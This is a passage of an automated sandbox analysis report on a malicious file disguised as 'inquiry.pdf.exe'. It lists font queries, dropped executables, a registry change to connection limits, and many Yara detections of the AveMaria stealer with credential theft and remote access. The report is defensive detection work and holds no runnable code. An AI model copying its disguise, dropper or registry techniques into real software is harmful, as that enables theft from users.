            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeQueries volume information: C:\Users\user\AppData\Roaming\glonkjhg.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeQueries volume information: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeQueries volume information: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeQueries volume information: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeQueries volume information: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Increases the number of concurrent connection per server for Internet Explorer
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeRegistry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10Jump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected AveMaria stealer
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3c4e6f2.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3b7d642.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3c8c5ea.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3d5d69a.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea8a38.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000003.485580240.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000003.486195668.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000000.403984932.0000000000919000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea8a38.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000003.485580240.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000003.486195668.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000000.403984932.0000000000919000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: inquiry.pdf.exe PID: 5896, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: glonkjhg.exe PID: 4760, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 2400, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 1916, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected AveMaria stealer
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3c4e6f2.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3b7d642.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3c8c5ea.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3d5d69a.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea8a38.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000003.485580240.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000003.486195668.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000000.403984932.0000000000919000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
